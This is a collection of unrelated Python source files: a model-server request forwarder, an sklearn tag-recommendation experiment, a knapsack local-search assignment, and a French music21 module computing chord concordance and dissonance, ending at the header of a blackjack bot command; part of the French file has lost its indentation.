        """Identity by default; subclasses may reshape the response here."""
        return request

    async def predict(self, request: Dict) -> Dict:
        """Forward the request to the predictor host; raise if none is configured."""
        if not self.predictor_host:
            raise NotImplementedError
        predict_url = PREDICTOR_URL_FORMAT.format(self.predictor_host, self.name)
        if self.protocol == "v2":
            predict_url = PREDICTOR_V2_URL_FORMAT.format(self.predictor_host, self.name)
        response = await self._http_client.fetch(
            predict_url,
            method='POST',
            request_timeout=self.timeout,
            body=json.dumps(request)
        )
        if response.code != 200:
            raise tornado.web.HTTPError(
                status_code=response.code,
                reason=response.body)
        return json.loads(response.body)

    async def explain(self, request: Dict) -> Dict:
        """Forward the request to the explainer host; raise if none is configured."""
        if self.explainer_host is None:
            raise NotImplementedError
        # Fixed: build the URL from explainer_host (was predictor_host).
        explain_url = EXPLAINER_URL_FORMAT.format(self.explainer_host, self.name)
        if self.protocol == "v2":
            explain_url = EXPLAINER_V2_URL_FORMAT.format(self.explainer_host, self.name)
        response = await self._http_client.fetch(
            url=explain_url,
            method='POST',
            request_timeout=self.timeout,
            body=json.dumps(request)
        )
        if response.code != 200:
            raise tornado.web.HTTPError(
                status_code=response.code,
                reason=response.body)
        return json.loads(response.body)
|
<reponame>zezip/StackOverflowTagRecommender<gh_stars>0
from pathlib import Path
import pandas as pd
import os
from os import listdir
from get_split import get_split
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.svm import SVC, LinearSVC
from sklearn.dummy import DummyClassifier
from sklearn.decomposition import TruncatedSVD
from sklearn.multioutput import MultiOutputClassifier
from sklearn.metrics import precision_recall_fscore_support
import numpy as np
# Project root (resolved from the current working directory) and the folder
# holding the chunked data files.
DIR = Path(os.path.abspath('')).resolve()
DATA = str(DIR/"data"/"chunked")
# Hyper-parameter grids: SVM regularization strengths (C_range is not used in
# this module's visible code) and truncated-SVD component counts.
C_range = [0.001,0.01,0.1,1,10,100,1000]
n_range = [8000]
def tfidf_tokenize(X_train, y_train, X_test, y_test):
    """TF-IDF experiment: LinearSVC, a dummy baseline, and an RBF SVC on
    truncated-SVD features. Prints accuracy and weighted P/R/F for each;
    returns None.

    Fixes vs. original:
    - `Xtest_SVD = svd.fit_transform(Xtest)` re-fitted the SVD on the test
      set (test-set leakage and a projection incompatible with the one the
      classifier was trained on); now uses `svd.transform`, consistent with
      count_tokenize().
    - the SVD was fitted twice (`svd.fit` then `fit_transform`); it is now
      fitted once and only transforms afterwards.
    """
    vectorizer = TfidfVectorizer()
    Xtrain = vectorizer.fit_transform(X_train.ravel())
    Xtest = vectorizer.transform(X_test.ravel())
    # --- SVC with linear kernel ---
    svm = LinearSVC(C=1)
    multilabel_clf = MultiOutputClassifier(svm)
    multilabel_clf = multilabel_clf.fit(Xtrain, y_train)
    y_test_pred = multilabel_clf.predict(Xtest)
    score = multilabel_clf.score(Xtest, y_test)
    print('')
    print('accuracy ',score)
    print('precision_recall_fscore_support ', precision_recall_fscore_support(y_test, y_test_pred, average='weighted'))
    # --- dummy classifier baseline ---
    dummy_clf = DummyClassifier()
    dummy_clf.fit(Xtrain, y_train)
    dummy_pred = dummy_clf.predict(Xtest)
    dummy_score = dummy_clf.score(Xtest, y_test)
    print('')
    print('dummy accuracy ', dummy_score)
    print('precision_recall_fscore_support ', precision_recall_fscore_support(y_test, dummy_pred, average='weighted'))
    # --- SVC with RBF kernel on truncated-SVD features ---
    for n in n_range:
        svd = TruncatedSVD(n_components=n)
        svd.fit(Xtrain)
        var_explained = svd.explained_variance_ratio_.sum()
        print(str(n) + ' variance: ',var_explained)
        Xtrain_SVD = svd.transform(Xtrain)
        Xtest_SVD = svd.transform(Xtest)
        svm = SVC(kernel='rbf', gamma='auto')
        multilabel_clf = MultiOutputClassifier(svm)
        clf_SVD = multilabel_clf.fit(Xtrain_SVD, y_train)
        y_pred_SVD = clf_SVD.predict(Xtest_SVD)
        score = clf_SVD.score(Xtest_SVD, y_test)
        print('')
        print('SVD accuracy for '+str(n)+' ', score)
        print('SVD precision_recall_fscore_support ', precision_recall_fscore_support(y_test, y_pred_SVD, average='weighted'))
        print('')
    return None
def count_tokenize(X_train, y_train, X_test, y_test):
    """Bag-of-words (raw counts) variant of the experiment: LinearSVC, a
    dummy baseline, and an RBF SVC on truncated-SVD features. Prints
    accuracy and weighted P/R/F for each; returns None."""
    vectorizer = CountVectorizer()
    Xtrain = vectorizer.fit_transform(X_train.ravel())
    Xtest = vectorizer.transform(X_test.ravel())
    """
    SVC with linear kernel
    """
    svm = LinearSVC(C=0.01)
    multilabel_clf = MultiOutputClassifier(svm)
    multilabel_clf = multilabel_clf.fit(Xtrain, y_train)
    y_test_pred = multilabel_clf.predict(Xtest)
    score = multilabel_clf.score(Xtest, y_test)
    print('')
    print('accuracy ',score)
    print('precision_recall_fscore_support ', precision_recall_fscore_support(y_test, y_test_pred, average='weighted'))
    """
    dummy classifier
    """
    dummy_clf = DummyClassifier()
    dummy_clf.fit(Xtrain, y_train)
    dummy_pred = dummy_clf.predict(Xtest)
    dummy_score = dummy_clf.score(Xtest, y_test)
    print('')
    print('dummy accuracy ', dummy_score)
    print('precision_recall_fscore_support ', precision_recall_fscore_support(y_test, dummy_pred, average='weighted'))
    """
    SVC with rbf kernel with Truncated SVD
    """
    for n in n_range:
        svd = TruncatedSVD(n_components=n)
        # NOTE(review): the SVD is fitted here and then re-fitted by
        # fit_transform below (redundant work); tfidf_tokenize has the same
        # pattern. Left as-is to preserve behavior.
        svd_fit = svd.fit(Xtrain)
        var_explained = svd.explained_variance_ratio_.sum()
        print(str(n) + ' variance: ',var_explained)
        Xtrain_SVD = svd.fit_transform(Xtrain)
        Xtest_SVD = svd.transform(Xtest)
        svm = SVC(kernel='rbf', gamma='auto')
        multilabel_clf = MultiOutputClassifier(svm)
        multilabel_clf_SVD = multilabel_clf.fit(Xtrain_SVD, y_train)
        y_pred_SVD = multilabel_clf_SVD.predict(Xtest_SVD)
        # multilabel_clf and multilabel_clf_SVD are the same object
        # (fit() returns self), so this scores the fitted classifier.
        score = multilabel_clf.score(Xtest_SVD, y_test)
        print('')
        print('SVD accuracy ', score)
        print('SVD precision_recall_fscore_support ', precision_recall_fscore_support(y_test, y_pred_SVD, average='weighted'))
    return None
if __name__ == "__main__":
    # get_split() returns the train/test split plus the tag-index mapping
    # (mapping unused here); run both vectorization experiments.
    (X_train, y_train, X_test, y_test), index_to_tag = get_split()
    print("==TFIDF==")
    tfidf_tokenize(X_train, y_train, X_test, y_test)
    print("==COUNT==")
    count_tokenize(X_train, y_train, X_test, y_test)
|
<filename>Assignment 4/Knapsack/template_knapsack.py
#! /usr/bin/env python3
'''NAMES OF THE AUTHOR(S): <NAME> <<EMAIL>>, <NAME> <<EMAIL>>'''
from search import *
import re
import sys
import os
import copy
import heapq
import time
class Knapsack(Problem):
    """Knapsack-with-conflicts instance for local search (extends Problem
    from the `search` module).

    State representation: a dict with keys 'items' (indices of packed
    items), 'weight' (their total weight) and 'utility' (their total
    utility). successor() also records a heuristic score per successor in
    self.value_list as a side effect, consumed by the search functions.
    """
    def __init__(self,initFile):
        # Instance file format: first line = number of items; then one line
        # per item "<id> <weight> <utility> [conflicting 1-based ids...]"
        # (stored 0-based); last line = knapsack capacity.
        try:
            file=open(initFile,'r')
            self.nItems = int(file.readline().strip().rstrip('\n'))
            self.itemWeight = []
            self.itemUtil = []
            self.conflicts = []
            for i in range(self.nItems):
                data = file.readline().strip().rstrip('\n')
                # Collapse runs of spaces so split(' ') yields clean fields.
                data = re.sub(' +',' ',data).split(' ')
                self.itemWeight.append(int(data[1]))
                self.itemUtil.append(int(data[2]))
                if len(data) > 3:
                    # File ids are 1-based; store 0-based indices.
                    self.conflicts.append([int(w)-1 for w in data[3:]])
                else:
                    self.conflicts.append([])
            self.capacity = int(file.readline().strip().rstrip('\n'))
            file.close()
            self.initial = self.initial_state()
        except IOError as error:
            print('Error opening the instance file: '+str(error))
            exit(-1)
    def initial_state(self):
        """Return the empty-knapsack state."""
        state = {}
        state['items'] = []
        state['weight'] = 0
        state['utility'] = 0
        return state
    def successor(self,state):
        """Yield (action, state) successors of `state`.

        Adds every non-conflicting item that fits; if nothing can be added,
        proposes removals instead. Side effect: fills self.value_list with a
        heuristic score per successor (utility/weight density for additions,
        inverse density for removals) in the same order as the successors.
        """
        successor_list = []
        value_list = []
        # add item
        if (state['items'] == []):
            # no items in the bag
            for index in range(self.nItems):
                if (state['weight'] + self.itemWeight[index]) <= self.capacity:
                    new_state = copy.deepcopy(state)
                    new_state['items'].append(index)
                    new_state['weight'] += self.itemWeight[index]
                    new_state['utility'] += self.itemUtil[index]
                    # value_list.append(self.itemUtil[index] / self.capacity)
                    # value_list.append(new_state['utility'] / new_state['weight'])
                    value_list.append(self.itemUtil[index] / self.itemWeight[index])
                    successor_list.append((0, new_state))
        else:
            # some items in the bag: gather every item conflicting with the
            # current contents, then try to add the remaining candidates.
            conflict_list = []
            for item_index in range(len(state['items'])):
                item = state['items'][item_index]
                # print('current item', item)
                for j in range(len(self.conflicts[item])):
                    conflict_list.append(self.conflicts[item][j])
            # print('conflicts', conflict_list)
            # print('items', state['items'])
            for index in range(self.nItems):
                if (index not in state['items']) and \
                        (index not in conflict_list) and \
                        ((state['weight'] + self.itemWeight[index]) <= self.capacity):
                    new_state = copy.deepcopy(state)
                    new_state['items'].append(index)
                    new_state['weight'] += self.itemWeight[index]
                    new_state['utility'] += self.itemUtil[index]
                    # value_list.append(self.itemUtil[index] / self.capacity)
                    # value_list.append(new_state['utility'] / new_state['weight'])
                    value_list.append(self.itemUtil[index] / self.itemWeight[index])
                    successor_list.append((0, new_state))
        # remove item — only when no addition was possible (escape move).
        # if (len(state['items']) > 1) and (state['weight'] >= 0.9 * self.capacity):
        if len(successor_list) == 0:
            for item_index in range(len(state['items'])):
                item = state['items'][item_index]
                new_state = copy.deepcopy(state)
                new_state['items'].remove(item)
                new_state['weight'] -= self.itemWeight[item]
                new_state['utility'] -= self.itemUtil[item]
                # if (new_state['utility'] / new_state['weight']) >= ((state['utility'] / state['weight'])):
                # value_list.append(((self.itemUtil[item]) / 2) / self.capacity)
                value_list.append(1 / (new_state['utility'] / new_state['weight']))
                # value_list.append(1 / self.itemUtil[item] / self.itemWeight[item])
                successor_list.append((0, new_state))
        self.value_list = value_list
        # Dead end: no move at all — return the state itself with value 0.
        if (successor_list == []):# or (length1 == length2):
            successor_list.append((0, state))
            self.value_list = [0]
        generator = (item for item in successor_list if item)
        return generator
    def value(self, state):
        """Objective maximized by the local search: the packed utility."""
        return state['utility'] # / state['weight'] # + 0.2 * (self.capacity - state['weight']) / state['weight']
    def getUtility(self,state):
        """
        :param state: a knapsack state dict
        :return: utility of the state in parameter
        """
        return state['utility']
    def __str__(self):
        """Render the instance in (roughly) its input-file format."""
        s=str(self.nItems)+'\n'
        for i in range(self.nItems):
            s+= '\t'+str(i)+' '+str(self.itemWeight[i])+' '+str(self.itemUtil[i])+'\n'
        s+= str(self.capacity)
        return s
#################
# Local Search #
#################
def maxvalue(problem, limit=100, callback=None):
    """Greedy local search: for `limit` steps, move to one of the
    best-valued successors (ties broken uniformly at random) and return
    the best node seen overall.

    NOTE: relies on problem.successor() storing each successor's heuristic
    score in problem.value_list as a side effect of current.expand(), in
    the same order as the successors. `random` and `LSNode` come from
    `from search import *`.
    """
    current = LSNode(problem, problem.initial, 0)
    best = current
    for step in range(limit):
        if callback is not None:
            callback(current)
        successor_list = list(current.expand())
        # value_list = [successor.value() for successor in successor_list]
        value_list = problem.value_list
        max_value = max(value_list)
        # Collect every successor achieving the maximum score.
        node_list = []
        for index in range(len(value_list)):
            if value_list[index] == max_value:
                node_list.append(successor_list[index])
        current = random.choice(node_list)
        if current.value() > best.value():
            best = current
    return best
def randomized_maxvalue(problem, limit=100, callback=None):
    """Randomized local search: at each step pick uniformly among the (up to)
    5 best-scored successors; return the best node seen over `limit` steps.

    Relies on problem.successor() storing each successor's heuristic score
    in problem.value_list (same order as the successors) as a side effect of
    current.expand(). `random` and `LSNode` come from `from search import *`.

    Fix: the original looked nodes up with `value_list.index(value)`, which
    always returns the FIRST occurrence — with duplicate scores, the same
    successor was added to the candidate pool several times while other
    top-5 successors were skipped. Selecting the top-k *indices* keeps the
    candidates distinct.
    """
    current = LSNode(problem, problem.initial, 0)
    best = current
    for _ in range(limit):
        if callback is not None:
            callback(current)
        successor_list = list(current.expand())
        value_list = problem.value_list
        pool_size = min(5, len(value_list))
        # Indices of the `pool_size` highest-scored successors.
        top_indices = heapq.nlargest(pool_size, range(len(value_list)),
                                     key=value_list.__getitem__)
        node_list = [successor_list[i] for i in top_indices]
        current = random.choice(node_list)
        if current.value() > best.value():
            best = current
    return best
#####################
# Launch #
#####################
# --- Launch: benchmark the three techniques on knapsack instances 1..10 ---
# Leftover toggle from the commented-out CLI mode below; unused otherwise.
a = 12
# if a == 1:
#     if(len(sys.argv) <=2 ):
#         print("Usage: "+sys.argv[0]+" instance_file technique_value (0: randomWalk,1: maxValue,2: randomizedMaxvalue)")
#         exit(-1)
#     knap = Knapsack(sys.argv[1])
#     tech = int(sys.argv[2])
# else:
for name in range(1, 11):
    folder = 'knapsack_instances'
    file = 'knapsack' + str(name) + '.txt'
    print('#####')
    print('instance', file)
    path = os.path.join(folder, file)
    knap = Knapsack(path)
    # tech 0: random walk (single run); tech 1: maxvalue; tech 2:
    # randomized_maxvalue — the last two are averaged over 10 runs and the
    # best state found across runs is reported.
    for tech in range(3):
        # setting parameter
        stepLimit = 100
        if(tech == 0):
            tic = time.time()
            best_node = random_walk(knap,stepLimit)
            toc = time.time()
            result_time = toc - tic
        elif(tech == 1):
            total_time = 0
            best_uti = 0
            best_node = 0
            for _ in range(10):
                tic = time.time()
                node = maxvalue(knap,stepLimit)
                toc = time.time()
                total_time += toc - tic
                state = node.state
                if state['utility'] > best_uti:
                    best_uti = state['utility']
                    best_node = node
            result_time = total_time / 10
        elif(tech == 2):
            total_time = 0
            best_uti = 0
            best_node = 0
            for _ in range(10):
                tic = time.time()
                node = randomized_maxvalue(knap,stepLimit)
                toc = time.time()
                total_time += toc - tic
                state = node.state
                if state['utility'] > best_uti:
                    best_uti = state['utility']
                    best_node = node
            result_time = total_time / 10
        print('tech: ', tech, 'time: ', result_time)
        state = best_node.state
        print("weight: " + str(state['weight']) + " utility: " + str(state['utility']))
        # print("Items: " + str([x + 1 for x in state['items']]))
        # print("Capacity: " + str(knap.capacity))
        print("STEP: "+str(best_node.step))
|
'''
Etant donnée une liste d'accords, les trie par ordre de concordance, consonance, tension et concordance totale,
en affichant en dessous les valeurs. Prend en entrée dans le fichier paramètre deux listes de même taille : partiels,
qui contient l'emplacement des partiels (éventuellement inharmoniques), et amplitudes, avec leurs amplitudes
respectives
'''
#from mimetypes import init
import numpy as np
from operator import itemgetter, attrgetter
from music21 import *
#from music21 import note, stream, corpus, tree, chord, pitch, converter
import parametres
import tunings
class ListeAccords:
'''
Prend en attribut un objet Stream, les parametres d'instrument et d'accord:
instrument = [liste des partiels, liste des amplitudes, liste des largeurs spectrales].
temperament = [Nom de la note de reference e partir de laquelle va etre fait l'accord, liste des deviations en cents des 11 notes
restantes par rapport au temperament tempere]
L'attribut 'grandeursHarmoniques' va stoker sous forme de liste les informations de concordance et de coherence de chaque accord,
ainsi que son nombre de notes
L'attribut normalisation va servir a normaliser les concordances des unissons de n notes
'''
def __init__(self, stream):
self.stream = stream
self.tree = tree.fromStream.asTimespans(stream, flatten=True,classList=(note.Note, chord.Chord))
self.partiels = parametres.partiels
self.amplitudes = parametres.amplitudes
self.sig = parametres.sig
self.temperament = tunings.Equal
#[0,0,0,0,0,0,0,0,0,0,0,0]#Tempere#
#[0,-10,+4,-6,+8,-2,-12,+2,-8,+6,-4,+10]#Pythagore
#[0,+17,-7,+10,-14,+3,+20,-3,+14,-10,+7,-17]#Mesotonique 1/4
#[]#Mesotonique 1/6
#[0,-29,+4,+16,-14,-2,-31,+2,-27,-16,-4,-12]#Juste Majeur
#[0,12,+4,+16,-13,-2,+32,+2,+14,-17,+18,-11]#Juste mineur
self.noteDeReferencePourLeTunning = parametres.noteDeReferencePourLeTunning
self.grandeursHarmoniques = []
self.normalisation = [2,3,4,5,6,7,8]
#self.ConcordanceCoherenceConcordanceOrdre3Liste()
def spectre(self,f0):
'''Cette methode va etre appelee dans la classe Accord, mais elle est definie ici car le seul attribut d'objet
qui en est parametre est l'instrument'''
n = np.arange(0,16,0.001)
S = np.zeros(np.shape(n))
for i in range(1, len(self.partiels) + 1):
S = S + (self.amplitudes[i-1]) * np.exp(-(n - np.log2(self.partiels[i-1] * f0))**2 / (2 * self.sig**2))
return S
#for i, elt in enumerate(self.instrument[0]):
# S = S + self.instrument[1][i] * np.exp(-(n - np.log2(elt * f0))**2 / (2 * (self.instrument[2][i])**2))
#return S
def Normalisation(self):
""" Calcule la concordance d'ordre n de l'unisson a n notes, pour n allant de 2 a 8"""
self.normalisation[0] = np.sum(self.spectre(100)*self.spectre(100))
self.normalisation[1] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/3)
self.normalisation[2] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/4)
self.normalisation[3] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/5)
self.normalisation[4] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/6)
self.normalisation[5] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/7)
self.normalisation[6] = (np.sum(self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)*self.spectre(100)))**(2/8)
def frequenceAvecTemperament(self,pitch1):
"""Fonction qui prend en entree un pitch pour renvoyer une frequence, en tenant compte du temperament"""
pitchRef = pitch.Pitch(self.noteDeReferencePourLeTunning)
pitch1.microtone = self.temperament[(pitch1.pitchClass - pitchRef.pitchClass)%12] - 100*((pitch1.pitchClass - pitchRef.pitchClass)%12)
return (pitch1.frequency)
def ConcordanceCoherenceConcordanceOrdre3Liste (self):
''' Transforme chaque verticalite en objet Accord, calcule la concordance, la coherence et les concordances multiples, et stocke les resultats
sous forme de liste d'Accords"
'''
self.Normalisation()
for verticality in self.tree.iterateVerticalities():
v = Accord(verticality, self.partiels, self.amplitudes, self.sig, self.normalisation, self.temperament,self.noteDeReferencePourLeTunning)
if verticality.bassTimespan!=None :
v.identifiant = verticality.bassTimespan.element.id
v.ListeHauteursAvecMultiplicite()
v.ListeConcordanceDesIntervallesDansAccord()
v.NombreDeNotes()
if v.nombreDeNotes>=2:
v.Concordance()
v.Dissonance()
if v.nombreDeNotes>=3:
v.Tension()
v.ConcordanceTotale()
self.grandeursHarmoniques.append(v)
def getAnnotatedStream(self, resultList = ['concordance']):
for gH in self.grandeursHarmoniques:
if gH.verticality.bassTimespan != None :
element = gH.verticality.bassTimespan.element
if element.isNote or element.isChord:
dataString = ""
if 'concordance' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str(round(gH.concordance,2))
if 'concordanceOrdre3' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str(round(10 * gH.concordanceOrdre3,2))
if 'concordanceTotale' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str(round(10 * gH.concordanceTotale,2))
if 'dissonance' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str (round(gH.dissonance,2))
if 'tension' in resultList:
if dataString != '': dataString + " "
dataString = dataString + str (round(gH.tension,2))
element.lyric = dataString
return tree.toStream.partwise(self.tree, self.stream)
def moyenneConcordance (self):
l = []
for accord in self.grandeursHarmoniques:
l.append(accord.concordance)
return np.mean(l)
def moyenneConcordanceTotale (self):
l = []
for accord in self.grandeursHarmoniques:
l.append(accord.concordanceTotale)
return np.mean(l)
def moyenneConcordanceOrdre3 (self):
l = []
for accord in self.grandeursHarmoniques:
l.append(accord.concordanceOrdre3)
return np.mean(l)
def offsetList (self):
'''Donne la liste de tous les offsets des verticalites'''
l = []
for verticality in self.tree.iterateVerticalities():
v = Accord(verticality)
l.append(v.offset)
return l
def idList (self):
'''Donne la liste des identifiants des verticalites'''
l = []
for verticality in self.tree.iterateVerticalities():
v = Accord(verticality)
l.append(v.id)
return l
def classementConc(self):
s = stream.Measure()
ts1 = meter.TimeSignature('C')
s.insert(0, ts1)
s.insert(0, clef.TrebleClef())
self.stream.lyrics = {}
self.getAnnotatedStream('concordance')
self.grandeursHarmoniques.sort(key=attrgetter('concordance'), reverse=True)
for gH in self.grandeursHarmoniques:
element = gH.verticality.bassTimespan.element
s.insert(-1, element)
s[0].addLyric('Concordance')
s.show()
del s[0].lyrics[1]
def classementConcTot(self):
    """Display the verticalities ranked by decreasing total concordance."""
    measure = stream.Measure()
    measure.insert(0, meter.TimeSignature('C'))
    measure.insert(0, clef.TrebleClef())
    self.stream.lyrics = {}
    self.getAnnotatedStream(['concordanceTotale'])
    self.grandeursHarmoniques.sort(key=attrgetter('concordanceTotale'), reverse=True)
    for gH in self.grandeursHarmoniques:
        measure.insert(-1, gH.verticality.bassTimespan.element)
    measure[0].addLyric('ConcTot')
    measure.show()
    del measure[0].lyrics[1]
def classementDiss(self):
    """Display the verticalities ranked by increasing dissonance."""
    s1 = stream.Measure()
    ts1 = meter.TimeSignature('C')
    s1.insert(0, ts1)
    s1.insert(0, clef.TrebleClef())
    self.stream.lyrics = {}
    # Consistency fix: pass a list of descriptor names, matching
    # classementConcTot (the string form relied on substring matching).
    self.getAnnotatedStream(['dissonance'])
    self.grandeursHarmoniques.sort(key=attrgetter('dissonance'), reverse=False)
    for gH in self.grandeursHarmoniques:
        element = gH.verticality.bassTimespan.element
        s1.insert(-1, element)
    s1[0].addLyric('Dissonance')
    s1.show()
    del s1[0].lyrics[1]
def classementTens(self):
    """Display the verticalities ranked by increasing tension."""
    s3 = stream.Measure()
    ts1 = meter.TimeSignature('C')
    s3.insert(0, ts1)
    s3.insert(0, clef.TrebleClef())
    self.stream.lyrics = {}
    # Consistency fix: pass a list of descriptor names, matching
    # classementConcTot (the string form relied on substring matching).
    self.getAnnotatedStream(['tension'])
    self.grandeursHarmoniques.sort(key=attrgetter('tension'), reverse=False)
    for gH in self.grandeursHarmoniques:
        element = gH.verticality.bassTimespan.element
        s3.insert(-1, element)
    s3[0].addLyric('Tension')
    s3.show()
    del s3[0].lyrics[1]
#sorted(self.grandeursHarmoniques, key=attrgetter('concordance'))
#return tree.toStream.partwise(self.tree, self.stream)
class Accord(ListeAccords):
    """A single verticality (chord) with its harmonic descriptors.

    Inherits the instrument model and the ``spectre`` /
    ``frequenceAvecTemperament`` helpers from ListeAccords; the computed
    descriptors (concordance, dissonance, tension, ...) are attributes
    initialised to 0 and filled in by the corresponding methods.

    Known weakness (by design, from the original author): the parent's
    tree is empty — the 'verticality' attribute takes its place.
    """

    def __init__(self, verticality, partiels, amplitudes, sig, normalisation,
                 temperament, noteDeReferencePourLeTunning):
        # Spectral-model parameters shared with the parent class.
        self.partiels = partiels
        self.amplitudes = amplitudes
        self.sig = sig
        self.temperament = temperament
        self.noteDeReferencePourLeTunning = noteDeReferencePourLeTunning
        self.normalisation = normalisation
        # Pitches counted once per sounding voice.
        self.listeHauteursAvecMultiplicite = []
        # Pairwise interval concordances, cached to avoid recomputation.
        self.listeConcordanceDesIntervallesDansAccord = []
        self.verticality = verticality
        # Harmonic descriptors, filled in by the methods below.
        self.concordance = 0
        self.concordanceTotale = 0
        self.concordanceOrdre3 = 0
        self.dissonance = 0
        self.tension = 0
        self.identifiant = 0
        self.nombreDeNotes = 0

    def __repr__(self):
        """Summary of the main concordance descriptors."""
        # BUG FIX: the original used format indices {0}, {2}, {3} with only
        # three arguments, which raised IndexError at display time.
        return "Concordance: {0} \nConcordance d'ordre 3: {1} \nConcordance totale: {2}".format(self.concordance, self.concordanceOrdre3, self.concordanceTotale)

    def ListeHauteursAvecMultiplicite(self):
        """Collect every pitch of the verticality, once per sounding voice
        (pitches repeated in different voices are counted multiple times).
        Zero-duration elements in the starting timespans are skipped.
        """
        for elt in self.verticality.startTimespans:
            if elt.element.isChord:
                for pitch in elt.element.pitches:
                    if elt.element.duration.quarterLength != 0:
                        self.listeHauteursAvecMultiplicite.append(pitch)
            elif elt.element.duration.quarterLength != 0:
                self.listeHauteursAvecMultiplicite.append(elt.element.pitch)
        for elt in self.verticality.overlapTimespans:
            if elt.element.isChord:
                for pitch in elt.element.pitches:
                    self.listeHauteursAvecMultiplicite.append(pitch)
            else:
                self.listeHauteursAvecMultiplicite.append(elt.element.pitch)

    def ListeConcordanceDesIntervallesDansAccord(self):
        """Cache the concordance of every unordered pitch pair of the chord,
        avoiding redundant work in the concordance computation.

        Each note's spectrum is computed once and reused (the original
        recomputed it for every pair).
        """
        spectres = [self.spectre(self.frequenceAvecTemperament(p))
                    for p in self.listeHauteursAvecMultiplicite]
        for i in range(len(spectres)):
            for j in range(i + 1, len(spectres)):
                self.listeConcordanceDesIntervallesDansAccord.append(np.sum(spectres[i] * spectres[j]))

    def NombreDeNotes(self):
        """Record the number of sounding notes."""
        if self.listeHauteursAvecMultiplicite is not None:
            self.nombreDeNotes = len(self.listeHauteursAvecMultiplicite)

    def Concordance(self):
        """Mean pairwise concordance, normalised by the number of note pairs
        so that unissons of n notes compare equally."""
        self.concordance = np.sum(self.listeConcordanceDesIntervallesDansAccord)
        self.concordance = self.concordance / (self.nombreDeNotes * (self.nombreDeNotes - 1) / 2)

    def ConcordanceTotale(self):
        """Total concordance: the product of all note spectra, summed, with a
        2/n exponent to keep a comparable scale across chord sizes."""
        S = np.ones(16000)
        for pitch in self.listeHauteursAvecMultiplicite:
            S = S * self.spectre(self.frequenceAvecTemperament(pitch))
        self.concordanceTotale = np.sum(S)
        self.concordanceTotale = self.concordanceTotale ** (2 / self.nombreDeNotes)

    def Dissonance(self):
        """Sethares-style roughness summed over all partial pairs of all note
        pairs, normalised by the number of note pairs.

        Frequencies are hoisted out of the partial loops (the original
        recomputed frequenceAvecTemperament for every partial pair).
        """
        freqs = [self.frequenceAvecTemperament(p) for p in self.listeHauteursAvecMultiplicite]
        nPartiels = len(self.partiels)
        for i in range(len(freqs)):
            for j in range(i + 1, len(freqs)):
                for k1 in range(nPartiels):
                    for k2 in range(nPartiels):
                        f1 = self.partiels[k1] * freqs[i]
                        f2 = self.partiels[k2] * freqs[j]
                        fmin = min(f1, f2)
                        fmax = max(f1, f2)
                        # Critical-bandwidth scaling factor.
                        s = 0.24 / (0.021 * fmin + 19.)
                        self.dissonance = self.dissonance + (100 * self.amplitudes[k1] * self.amplitudes[k2]) * (np.exp(-3.5 * s * (fmax - fmin)) - np.exp(-5.75 * s * (fmax - fmin)))
        self.dissonance = self.dissonance / (self.nombreDeNotes * (self.nombreDeNotes - 1) / 2)

    def Tension(self):
        """Triadic tension: for every note triple and partial triple, measure
        how close the two stacked log-frequency intervals are in size.

        FIX: the original contained a duplicated assignment
        ('self.tension = self.tension = self.tension + ...').
        """
        freqs = [self.frequenceAvecTemperament(p) for p in self.listeHauteursAvecMultiplicite]
        nPartiels = len(self.partiels)
        a = 0.6  # tension bandwidth parameter
        for i in range(len(freqs)):
            for j in range(i + 1, len(freqs)):
                for l in range(j + 1, len(freqs)):
                    for k1 in range(nPartiels):
                        for k2 in range(nPartiels):
                            for k3 in range(nPartiels):
                                x = np.log2((self.partiels[k2] * freqs[j]) / (self.partiels[k1] * freqs[i]))
                                y = np.log2((self.partiels[k3] * freqs[l]) / (self.partiels[k2] * freqs[j]))
                                z = x + y
                                X = abs(x)
                                Y = abs(y)
                                Z = abs(z)
                                self.tension = self.tension + (self.amplitudes[k1] * self.amplitudes[k2] * self.amplitudes[k3]) * max(np.exp(-(12 * (X - Y) / a) ** 2), np.exp(-(12 * (Y - Z) / a) ** 2), np.exp(-(12 * (X - Z) / a) ** 2))
        self.tension = self.tension / (self.nombreDeNotes * (self.nombreDeNotes - 1) * (self.nombreDeNotes - 2) / 6)

    def ConcordanceOrdre3(self):
        """Third-order concordance: triple products of note spectra summed
        over all note triples, with a 2/3 exponent.

        Each note's spectrum is computed once and reused.
        """
        spectres = [self.spectre(self.frequenceAvecTemperament(p))
                    for p in self.listeHauteursAvecMultiplicite]
        for i in range(len(spectres)):
            for j in range(i + 1, len(spectres)):
                for k in range(j + 1, len(spectres)):
                    self.concordanceOrdre3 = self.concordanceOrdre3 + np.sum(spectres[i] * spectres[j] * spectres[k])
        self.concordanceOrdre3 = self.concordanceOrdre3 ** (2 / 3)
# ---------------------------------------------------------------------------
# Script entry: load a score, compute the harmonic descriptors and display
# the concordance ranking.  Alternative input scores are kept commented for
# reference.
# ---------------------------------------------------------------------------
score = converter.parse('/Users/manuel/Github/DescripteursHarmoniques/Exemples/SuiteAccords.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/AccordsMineur.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/Majeur3et4notes.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/Mineur3et4notes.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/Tension.musicxml')
#score = converter.parse('/Users/manuel/Dropbox (TMG)/Thèse/Disposition/DispoMajeurMineur.musicxml')
l = ListeAccords(score)
l.ConcordanceCoherenceConcordanceOrdre3Liste()
l.classementConc()
#l.classementDiss()
#l.classementConcTot()
#l.classementTens()
|
<reponame>M2rsho/PyBot-v5
"""
Black Jack Command
